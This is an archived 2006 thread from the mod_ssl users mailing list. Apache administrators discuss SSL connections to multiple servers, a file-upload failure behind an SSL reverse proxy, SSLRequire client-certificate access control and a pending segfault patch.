Am confused. Because my understanding was SSL is Secure
socket layer, and one cannot tamper with this tunnel. And I used to
think, when I ask the browser to open some URL, it opens a connection
(by obtaining a socket, say 56789, from underlying OS) to the port 80
of URL server. Now I feel, if the URL page has objects residing on
other servers, my browser opens separate sockets (different from 56789)
for these objects.!? Please clarify my doubts. Or point me to some
guides et al.


Thank you for your patience.

-- 
Best Regar=
ds,
Vishwas.





------=_Part_5802_12525336.1145972232568--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr 25 17:09:05 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 886CC14D898; Tue, 25 Apr 2006 17:09:05 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from asterisk.pobox.com (asterisk.pobox.com [207.106.36.222])
	by master.modssl.org (Postfix) with ESMTP id 0844514D84A
	for ; Tue, 25 Apr 2006 17:09:04 +0200 (CEST)
Received: from asterisk (localhost [127.0.0.1])
	by asterisk.pobox.com (Postfix) with ESMTP id 6F3CB1207E
	for ; Tue, 25 Apr 2006 11:09:24 -0400 (EDT)
Received: from webmail.pobox.com (localhost [127.0.0.1])
	by asterisk.pobox.com (Postfix) with ESMTP id 564CB1207D
	for ; Tue, 25 Apr 2006 11:09:23 -0400 (EDT)
Received: from 70.96.103.154
        (SquirrelMail authenticated user dparis@w3works.com)
        by webmail.pobox.com with HTTP;
        Tue, 25 Apr 2006 11:09:24 -0400 (EDT)
Message-ID: <44593.70.96.103.154.1145977764.squirrel@webmail.pobox.com>
In-Reply-To: 
References: 
    
Date: Tue, 25 Apr 2006 11:09:24 -0400 (EDT)
Subject: Re: A SSL scenario (involving multiple SSL-servers)
From: dparis@w3works.com
To: modssl-users@modssl.org
User-Agent: SquirrelMail/1.4.6
MIME-Version: 1.0
Content-Type: text/plain;charset=iso-8859-1
Content-Transfer-Encoding: 8bit
X-Priority: 3 (Normal)
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: dparis@w3works.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

The first hit is going to be pretty expensive on the client, since it has
to negotiate four different sets of keys.  Subsequent requests will be
better, but still take a bit of overhead on the client to decrypt each
connction pseduo-simultaneously.

Perhaps a better plan would have been to create a single (or
high-availability pair using "keepalived") SSL-terminating reverse proxy
that map requests  for certain images to standard (http, not https)
webservers on a privately addressed network.  This would cut down the
client workload by 75% if you've got four SSL servers.  Pound (
http://www.apsis.ch/pound/ ) is a great SSL-terminating reverse proxy
that's very lightweight and fast.  I've deployed it often and found it to
be very stable, flexible, and responsive.  Even on oldish hardware, it can
terminate upwards of 400 SSL sessions per second... newer hardware would
obviously push that number higher.  Additionally, it has a FAR smaller
footprint than say using Apache as proxy.

Kind Regards,
-dsp

> Every item the browser requests, such as images, comes from a
> unique/distinct connection.
>
> So the links to the other web servers will result in independent
> connections
> to the other web servers.  So you should be good to go.
>
>
>
> On 4/24/06, Vishwas  wrote:
>>
>> Hello there,
>>
>> I have few doubts, the scenario goes as below.
>>
>> Scenario: There are 4 SSL-enabled Apache servers {A1, A2, A3, A4}, all
>> of
>> them independently controlled and have valid certificates. Now, a "user"
>> on
>> A1 designs an HTML page ( index.html) that refers to images from all the
>> 4
>> servers. The links to these images are specified in the HTML file using
>> "
>> https://A[1-4]/..."
>>
>> Questions:
>> 1. A request for
>> https://A1/~user/index.htmlcomes, The
>> requestor is going to get a SSL connection from A1. And the
>> content from A1 to the browser is flowing through the SSL-tunnel. I
>> think
>> only the files that reside on A1 are going to flow through this tunnel
>> from
>> A1 to the browser!? And the files from A2, A3, and A4 are flowing
>> through
>> separate SSL-tunnels to the browser!? Then the browser shows only one
>> PADLOCK symbol, will it be for A1? YES. Then what about the
>> SSL-connections
>> from A2, A3, and A4? How does browser tells its user about these
>> connections?
>>
>> 2. Or does A1 brings the files from A2, A3, and A4 that referred inside
>> the "index.html" file by the "user" and serves to the browser?
>>
>> Am confused. Because my understanding was SSL is Secure socket layer,
>> and
>> one cannot tamper with this tunnel. And I used to think, when I ask the
>> browser to open some URL, it opens a connection (by obtaining a socket,
>> say
>> 56789, from underlying OS) to the port 80 of URL server. Now I feel, if
>> the
>> URL page has objects residing on other servers, my browser opens
>> separate
>> sockets (different from 56789) for these objects.!? Please clarify my
>> doubts. Or point me to some guides et al.
>>
>> Thank you for your patience.
>>
>> --
>> Best Regards,
>> Vishwas.
>>
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Apr 26 02:13:18 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 9993814D864; Wed, 26 Apr 2006 02:13:18 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web31613.mail.mud.yahoo.com (web31613.mail.mud.yahoo.com [68.142.198.159])
	by master.modssl.org (Postfix) with SMTP id CBEE614D844
	for ; Wed, 26 Apr 2006 02:13:17 +0200 (CEST)
Received: (qmail 77775 invoked by uid 60001); 26 Apr 2006 00:13:15 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.com;
  h=Message-ID:Received:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding;
  b=SVa8uXrltDQCvfO8EAPfJDuiCIRsV8RoSku6DRlIPo6QeqaP+nz6qrvOJoeTCkxcJouFwe9Y//3AiUoBKGSL3hM9fRS265BoFOf0j02fpUh7p632CBeoBcX5SKP6IAXOqg3+YHMaiBNtam/Fci6nrUsgJnE6G+KoHDZgtqtSC2w=  ;
Message-ID: <20060426001315.77773.qmail@web31613.mail.mud.yahoo.com>
Received: from [220.238.22.147] by web31613.mail.mud.yahoo.com via HTTP; Tue, 25 Apr 2006 17:13:15 PDT
Date: Tue, 25 Apr 2006 17:13:15 -0700 (PDT)
From: phemelo moses pitso 
Subject: Re: A SSL scenario (involving multiple SSL-servers)
To: modssl-users@modssl.org
In-Reply-To: 
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="0-768657901-1146010395=:77155"
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: phemelo moses pitso 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

--0-768657901-1146010395=:77155
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit

remove now!

BJ Swope  wrote:  Every item the browser requests, such as images, comes from a unique/distinct connection.

So the links to the other web servers will result in independent connections to the other web servers.  So you should be good to go.



  On 4/24/06, Vishwas  wrote:    Hello there,

I have few doubts, the scenario goes as below.

Scenario: There are 4 SSL-enabled Apache servers {A1, A2, A3, A4}, all of them independently controlled and have valid certificates. Now, a "user" on A1 designs an HTML page ( index.html) that refers to images from all the 4 servers. The links to these images are specified in the HTML file using "https://A[1-4]/..."

Questions:
1. A request for https://A1/~user/index.html comes, The requestor is going to get a SSL connection from A1. And the content from A1 to the browser is flowing through the SSL-tunnel. I think only the files that reside on A1 are going to flow through this tunnel from A1 to the browser!? And the files from A2, A3, and A4 are flowing through separate SSL-tunnels to the browser!? Then the browser shows only one PADLOCK symbol, will it be for A1? YES. Then what about the SSL-connections from A2, A3, and A4? How does browser tells its user about these connections? 

2. Or does A1 brings the files from A2, A3, and A4 that referred inside the "index.html" file by the "user" and serves to the browser?

Am confused. Because my understanding was SSL is Secure socket layer, and one cannot tamper with this tunnel. And I used to think, when I ask the browser to open some URL, it opens a connection (by obtaining a socket, say 56789, from underlying OS) to the port 80 of URL server. Now I feel, if the URL page has objects residing on other servers, my browser opens separate sockets (different from 56789) for these objects.!? Please clarify my doubts. Or point me to some guides et al. 

Thank you for your patience.

-- 
Best Regards,

  Vishwas. 




		
---------------------------------
Yahoo! Messenger with Voice. Make PC-to-Phone Calls to the US (and 30+ countries) for 2¢/min or less.
--0-768657901-1146010395=:77155
Content-Type: text/html; charset=iso-8859-1
Content-Transfer-Encoding: 8bit

remove now!

BJ Swope <bigblueswope@gmail.com> wrote:  
Every item the browser requests, such as images, comes from a unique/distinct connection.

So the links to the other web servers will result in independent connections to the other web servers.  So you should be good to go.



  
On 4/24/06, Vishwas <ivishwas@gmail.com> wrote:  
  
Hello there,

I have few doubts, the scenario goes as below.

Scenario: There are 4 SSL-enabled Apache servers {A1, A2, A3, A4}, all of them independently controlled and have valid certificates. Now, a "user" on A1 designs an
 HTML page ( index.html) that refers to images from all the 4 servers. The links to these images are specified in the HTML file using "https://A[1-4]/..."

Questions:
1. A request for https://A1/~user/index.html comes, The requestor is going to get a SSL connection from A1. And the content from A1 to the browser is flowing through the SSL-tunnel. I think only the files that reside on A1 are going to flow through this tunnel from A1 to the browser!? And the files from A2, A3, and A4 are flowing through separate SSL-tunnels to the browser!? Then the browser shows only one PADLOCK symbol, will it be for A1? YES. Then what about the SSL-connections from A2, A3, and A4? How does browser tells its user about these connections? 

2. Or does A1 brings the files from A2, A3, and A4 that referred inside the "index.html" file by the "user" and serves
 to the browser?

Am confused. Because my understanding was SSL is Secure socket layer, and one cannot tamper with this tunnel. And I used to think, when I ask the browser to open some URL, it opens a connection (by obtaining a socket, say 56789, from underlying OS) to the port 80 of URL server. Now I feel, if the URL page has objects residing on other servers, my browser opens separate sockets (different from 56789) for these objects.!? Please clarify my doubts. Or point me to some guides et al. 

Thank you for your patience.

-- 
Best Regards,
  
Vishwas. 



		
Yahoo! Messenger with Voice. Make PC-to-Phone Calls to the US (and 30+ countries) for 2¢/min or less.
--0-768657901-1146010395=:77155--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Apr 26 07:12:53 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id E3A8414D864; Wed, 26 Apr 2006 07:12:53 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from xproxy.gmail.com (xproxy.gmail.com [66.249.82.199])
	by master.modssl.org (Postfix) with ESMTP id 3A3A114D83A
	for ; Wed, 26 Apr 2006 07:12:52 +0200 (CEST)
Received: by xproxy.gmail.com with SMTP id s19so950693wxc
        for ; Tue, 25 Apr 2006 22:12:50 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references;
        b=clIp4+I9RJOwPv1imjCENXklSC3c/oFXlV8dYTwniixGzyYKyfyQXnjpu9fL6R9f9UkTTYmg989vMsQJsCd9O0w4nvb4NjU7LiIiqNB57hbOXI6eFtQAjO8uQpVcdvoiaXRe439fZJca0gUaZ7ZO/FmLZ3tvF5j3ezi6KlYxp74=
Received: by 10.70.24.7 with SMTP id 7mr329916wxx;
        Tue, 25 Apr 2006 22:12:50 -0700 (PDT)
Received: by 10.70.14.16 with HTTP; Tue, 25 Apr 2006 22:12:50 -0700 (PDT)
Message-ID: 
Date: Wed, 26 Apr 2006 13:12:50 +0800
From: "Ken Chen" 
To: modssl-users@modssl.org
Subject: Re: Failed uploading file to Appache HTTP Server after using SSL
In-Reply-To: 
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
References: 
	 
	 
	 <20060421061859.GA1326@redhat.com>
	 
	 <20060421072628.GA1851@redhat.com>
	 
	 
	 
	 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ken Chen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

FYI.

We had to choose to test that by using other versions and we found
that the problem is resolved if we downgrade to 2.0.50.

Ken

On 4/22/06, Ken Chen  wrote:
> FYI.
>
> I have tried to test upload with Firefox.  But it turns out that it
> fails too.  Then, it might not be only a MSIE issue.
>
>
>
> On 4/22/06, Ken Chen  wrote:
> > Hi,
> >
> > My colleague has helped to deploy the patch and the ssl vhost has been
> > configured as follow:
> > 
> >         DocumentRoot "/home/server/webpage"
> >         ServerName 192.168.2.130:443
> >         LogLevel debug
> >         ErrorLog logs/ssl-error_log
> >         CustomLog logs/ssl-access_log common
> >
> >         BrowserMatch ".*MSIE.*" \
> >         nokeepalive ssl-unclean-shutdown \
> >         downgrade-1.0 force-response-1.0
> >
> >         ProxyPass /eservices http://localhost:8855/eservices
> >         ProxyPassReverse /eservices http://localhost:8855/eservices
> >
> >         Alias /eservices-webpage/ /home/server/webpage/
> >
> > SSLEngine on
> > SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EX=
P:+eNULL
> > SSLCertificateFile someCrt.crt
> > SSLCertificateKeyFile someKey.key
> > 
> >
> > But seems the problem remains: Page can't be displayed.  I found no
> > error in log (maybe I was not able to found).  Here attached the log
> > when I press upload to upload file.
> >
> >
> > Ken
> >
> >
> > On 4/21/06, Ken Chen  wrote:
> > > Joe,
> > >
> > > Do you mind telling me how to apply the patch?  Type command as follo=
w?
> > > patch -s < xxxx.patch
> > >
> > > Do I need to stop the httpd server?  or recompile or anything else?
> > >
> > > Thanks.
> > >
> > >
> > > On 4/21/06, Ken Chen  wrote:
> > > > ic.  Thanks so much.  I will apply that patch and see what is going=
 on later.
> > > >
> > > >
> > > > On 4/21/06, Joe Orton  wrote:
> > > > > On Fri, Apr 21, 2006 at 03:19:35PM +0800, Ken Chen wrote:
> > > > > > Hi Joe,
> > > > > >
> > > > > > We are using 2.0.55 already.  Is it already include that patch?
> > > > >
> > > > > No, it will be in 2.0.56 and later.  But note this only applies i=
f you
> > > > > are using a reverse proxy, and it only affects the application of=
 the
> > > > > BrowserMatch statement - if you don't have the BrowserMatch, it h=
as no
> > > > > effect.
> > > > >
> > > > > joe
> > > > > _________________________________________________________________=
_____
> > > > > Apache Interface to OpenSSL (mod_ssl)                   www.modss=
l.org
> > > > > User Support Mailing List                      modssl-users@modss=
l.org
> > > > > Automated List Manager                            majordomo@modss=
l.org
> > > > >
> > > >
> > > >
> > > > --
> > > > --------------------------------------------------
> > > > Ken Chen
> > > >
> > >
> > >
> > > --
> > > --------------------------------------------------
> > > Ken Chen
> > >
> >
> >
> > --
> > --------------------------------------------------
> > Ken Chen
> >
> >
> >
>
>
> --
> --------------------------------------------------
> Ken Chen
>


--
--------------------------------------------------
Ken Chen
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Apr 26 14:07:32 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id F31B614D87D; Wed, 26 Apr 2006 14:07:31 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.pre-secure.de (mail.pre-secure.de [213.238.39.87])
	by master.modssl.org (Postfix) with ESMTP id 948F914D83A
	for ; Wed, 26 Apr 2006 14:07:31 +0200 (CEST)
Received: by mail.pre-secure.de (Postfix, from userid 2021)
	id BD56941C167; Wed, 26 Apr 2006 14:07:29 +0200 (CEST)
Received: from localhost (localhost [127.0.0.1])
	by mail.pre-secure.de (Postfix) with ESMTP id 9EF0C41C165
	for ; Wed, 26 Apr 2006 14:07:29 +0200 (CEST)
Received: from mail.pre-secure.de ([127.0.0.1])
 by localhost (mail.pre-secure.de [127.0.0.1]) (amavisd-new, port 10024)
 with ESMTP id 18386-03 for ;
 Wed, 26 Apr 2006 14:07:25 +0200 (CEST)
Received: from imap.pre-secure.de (jin_b.pre-secure.de [192.168.0.75])
	by mail.pre-secure.de (Postfix) with ESMTP
	for ; Wed, 26 Apr 2006 14:07:25 +0200 (CEST)
Received: from [193.174.13.134] (unknown [193.174.13.134])
	by imap.pre-secure.de (Postfix) with ESMTP id 5BE5338466
	for ; Wed, 26 Apr 2006 14:07:25 +0200 (CEST)
Message-ID: <444F6322.2090004@pre-secure.de>
Date: Wed, 26 Apr 2006 14:10:10 +0200
From: Olaf Gellert 
Organization: PRESECURE Consulting GmbH
X-Accept-Language: en-us, en
MIME-Version: 1.0
To:  modssl-users@modssl.org
Subject: SSLRequire
X-Enigmail-Version: 0.91.0.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: amavisd-new at mail.pre-secure.de
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Olaf Gellert 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

I still have trouble configuring apache 2.0 with the
SSLRequire directive. For me it looks like that:

When I have something that allows access (eg.
"allow 192.186.2" and I connect from that
network), than access is allowed (and the
SSLRequire expression has no effect, it is
simply ignored). When I have something that
denies access (eg. "deny all"), than access
is denied (again SSLRequire has no effect).
How are these mechanisms supposed to interact?

I did try "Satisfy any" and "Satisfy all",
and I tried "SSLOptions +StrictRequire",
but no help. I want to restrict access to a
directory of the webserver to only certain
users (= X.509 certificates). Anyone has a
working config for this? At the end of this
mail is a part of my configuration... So Client
authentication is already required, but the
entries from the certificates are not considered
when granting access.

Thanx for any help, cheers, Olaf

    SSLEngine on
    SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:!LOW:!SSLv2:!EXP:!eNULL
    SSLCertificateFile /etc/apache2/ssl.ssltest/server-cert.pem
    SSLCertificateKeyFile /etc/apache2/ssl.ssltest/server-key.pem
    SSLCertificateChainFile /etc/apache2/ssl.ssltest/server-chain.pem
    SSLCACertificateFile /etc/apache2/ssl.ssltest/clientcachain.pem
    SSLVerifyClient require
    SSLVerifyDepth 3

    
       AllowOverride None
       Options FollowSymLinks +Includes
       Order deny,allow
       Deny from all
       Allow from 192.168.2 127.0.0.1
       SSLRequireSSL
       SSLOptions +StdEnvVars +StrictRequire
       SSLRequire ( %{SSL_CLIENT_S_DN_O} eq "SSLTest SubCA 01" \
               && %{SSL_CLIENT_S_DN_CN} eq "Testuser" )
   




-- 
Dipl.Inform. Olaf Gellert                  PRESECURE (R)
Senior Researcher,                       Consulting GmbH
Phone: (+49) 0700 / PRESECURE           og@pre-secure.de

                        A daily view on Internet Attacks
                        https://www.ecsirt.net/sensornet

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Apr 26 16:42:05 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id EA82614D890; Wed, 26 Apr 2006 16:42:04 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mx1.redhat.com (mx1.redhat.com [66.187.233.31])
	by master.modssl.org (Postfix) with ESMTP id 7FDD814D83A
	for ; Wed, 26 Apr 2006 16:42:03 +0200 (CEST)
Received: from int-mx1.corp.redhat.com (int-mx1.corp.redhat.com [172.16.52.254])
	by mx1.redhat.com (8.12.11.20060308/8.12.11) with ESMTP id k3QEg1D0020472;
	Wed, 26 Apr 2006 10:42:01 -0400
Received: from turnip.cambridge.redhat.com (turnip.cambridge.redhat.com [172.16.18.137])
	by int-mx1.corp.redhat.com (8.12.11.20060308/8.11.6) with ESMTP id k3QEg0G0011469;
	Wed, 26 Apr 2006 10:42:00 -0400
Received: from turnip.cambridge.redhat.com (localhost.localdomain [127.0.0.1])
	by turnip.cambridge.redhat.com (8.13.6/8.13.5) with ESMTP id k3QEfxM2029334;
	Wed, 26 Apr 2006 15:41:59 +0100
Received: (from jorton@localhost)
	by turnip.cambridge.redhat.com (8.13.6/8.13.6/Submit) id k3QEfxxY029333;
	Wed, 26 Apr 2006 15:41:59 +0100
X-Authentication-Warning: turnip.cambridge.redhat.com: jorton set sender to jorton@redhat.com using -f
Date: Wed, 26 Apr 2006 15:41:59 +0100
From: Joe Orton 
To: Ken Chen 
Cc: modssl-users@modssl.org
Subject: Re: Failed uploading file to Appache HTTP Server after using SSL
Message-ID: <20060426144159.GA29185@redhat.com>
Mail-Followup-To: Ken Chen , modssl-users@modssl.org
References:   <20060421061859.GA1326@redhat.com>  <20060421072628.GA1851@redhat.com>     
Mime-Version: 1.0
Content-Type: text/plain; charset=utf-8
Content-Disposition: inline
In-Reply-To: 
User-Agent: Mutt/1.4.2.1i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joe Orton 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Wed, Apr 26, 2006 at 01:12:50PM +0800, Ken Chen wrote:
> FYI.
> 
> We had to choose to test that by using other versions and we found
> that the problem is resolved if we downgrade to 2.0.50.

Was this an exhaustive search: 2.0.51 failed but 2.0.50 worked?  That 
would be a little surprising: there aren't any regressions in 2.0.51 
that I know of. 

joe

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Apr 26 21:19:18 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id EDB0E14D890; Wed, 26 Apr 2006 21:19:17 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from pproxy.gmail.com (pproxy.gmail.com [64.233.166.177])
	by master.modssl.org (Postfix) with ESMTP id 3906D14D83A
	for ; Wed, 26 Apr 2006 21:19:14 +0200 (CEST)
Received: by pproxy.gmail.com with SMTP id b29so1749236pya
        for ; Wed, 26 Apr 2006 12:19:12 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:mime-version:content-type;
        b=rEFJov0y+Q/12mTdkykAnqtQpmd/0m0wr/nzpoATyPWqwgOGBsBQe1RUz3GPeIqICwFkYiBVEIdQDQlVYnpbqrAvN0jPOE7B+CyZ6qrjK+8MOkQt7BxeXYMd5S5hNYbliRgesbpk87ELDajB2AhN1r+PIbx5u02pa3P0iKEgprQ=
Received: by 10.35.84.12 with SMTP id m12mr333282pyl;
        Wed, 26 Apr 2006 12:19:12 -0700 (PDT)
Received: by 10.35.114.3 with HTTP; Wed, 26 Apr 2006 12:19:11 -0700 (PDT)
Message-ID: 
Date: Wed, 26 Apr 2006 21:19:11 +0200
From: Vishwas 
To: modssl-users@modssl.org
Subject: SSL "palin text" mode
MIME-Version: 1.0
Content-Type: multipart/alternative; 
	boundary="----=_Part_1446_28975950.1146079151928"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Vishwas 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_1446_28975950.1146079151928
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

Hello,
Can anybody please explain what is the "plain text" setting for SSL that is
described on this page by NetCraft.

http://news.netcraft.com/archives/2004/03/08/ssls_credibility_as_phishing_d=
efense_is_tested.html

Thanks.

Vishwas.

------=_Part_1446_28975950.1146079151928
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

Hello,
Can anybody please explain what is the "plain text" set=
ting for SSL that is described on this page by NetCraft.


http://news.netcraft.com/archives/2004/03/08/ssls_credibility_as_phishing_d=
efense_is_tested.html

Thanks.

Vishwas.


------=_Part_1446_28975950.1146079151928--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Apr 27 03:34:40 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 4A03B14D88C; Thu, 27 Apr 2006 03:34:40 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from xproxy.gmail.com (xproxy.gmail.com [66.249.82.193])
	by master.modssl.org (Postfix) with ESMTP id AC41014D82D
	for ; Thu, 27 Apr 2006 03:34:38 +0200 (CEST)
Received: by xproxy.gmail.com with SMTP id s19so1124860wxc
        for ; Wed, 26 Apr 2006 18:34:35 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references;
        b=EwX6m2bXD8GqSVN4zSMvaqwA0W8G7Sk3xyEqa9jY3x3X3nL/5NjdwJMrLm8xAiHDuW7MZM74N5GOK3TFh8M6uTRwraLujmD6XKeipvzvEgpsFm4v1/bsqlNKPQd5r4eBncweuaWpF754vnAS+RBTOYA/ShRhwRUIDxAtBk4A0kU=
Received: by 10.70.42.9 with SMTP id p9mr1346791wxp;
        Wed, 26 Apr 2006 18:34:35 -0700 (PDT)
Received: by 10.70.14.16 with HTTP; Wed, 26 Apr 2006 18:34:35 -0700 (PDT)
Message-ID: 
Date: Thu, 27 Apr 2006 09:34:35 +0800
From: "Ken Chen" 
To: modssl-users@modssl.org
Subject: Re: Failed uploading file to Appache HTTP Server after using SSL
In-Reply-To: <20060426144159.GA29185@redhat.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
References: 
	 <20060421061859.GA1326@redhat.com>
	 
	 <20060421072628.GA1851@redhat.com>
	 
	 
	 
	 
	 
	 <20060426144159.GA29185@redhat.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ken Chen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I am not sure.  The version I encountered problem is 2.0.55.


On 4/26/06, Joe Orton  wrote:
> On Wed, Apr 26, 2006 at 01:12:50PM +0800, Ken Chen wrote:
> > FYI.
> >
> > We had to choose to test that by using other versions and we found
> > that the problem is resolved if we downgrade to 2.0.50.
>
> Was this an exhaustive search: 2.0.51 failed but 2.0.50 worked?  That
> would be a little surprising: there aren't any regressions in 2.0.51
> that I know of.
>
> joe
>
>


--
--------------------------------------------------
Ken Chen
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat May  6 00:37:49 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id E244C14D86E; Sat,  6 May 2006 00:37:49 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from elephant.cnchost.com (elephant.cnchost.com [207.155.252.97])
	by master.modssl.org (Postfix) with ESMTP id 2E60F14D829
	for ; Sat,  6 May 2006 00:37:44 +0200 (CEST)
Received: from [192.168.0.21] (c-24-15-193-17.hsd1.il.comcast.net [24.15.193.17])
	by elephant.cnchost.com (ConcentricHost(2.54) Relay) with ESMTP id 609C55440
	for ; Fri,  5 May 2006 18:37:34 -0400 (EDT)
Message-ID: <445BD3AD.6000803@rowe-clan.net>
Date: Fri, 05 May 2006 17:37:33 -0500
From: "William A. Rowe, Jr." 
User-Agent: Mozilla Thunderbird 1.0.7-1.1.fc4 (X11/20050929)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To:  modssl-users@modssl.org
Subject: Re: PATCH Prevent segfaults in connection state
References: <43ECFEE9.6010104@rowe-clan.net>
In-Reply-To: <43ECFEE9.6010104@rowe-clan.net>
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "William A. Rowe, Jr." 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Ping, in anticipation of a 2.8.26 for 1.3.35 (are we expecting one?)

I didn't see any feedback, do any of the Apache guru's have comments?  Any
clarifications?  (I hope I made the specifics clear enough, below.)

Yours,

Bill


William A. Rowe, Jr. wrote:
> Maintainers,
> 
> This patch addresses a still-outstanding flaw in mod_ssl, on *all* platforms.
> However it's rarely evident on any platform other than Win32, because only Win32
> recycles memory -so quickly- on other threads, that the cleanup cannot be
> invoked.
> 
> Instead, in the LogRequest (request-is-done) hook is used to clean everything
> up before r->pool goes poof.
> 
> Please, again consider this patch... I'm finished submitting through private
> channels and would like the end-users to be able to take advantage of it 
> already.
> 
> Thanks.
> 
> Bill
> 
> 
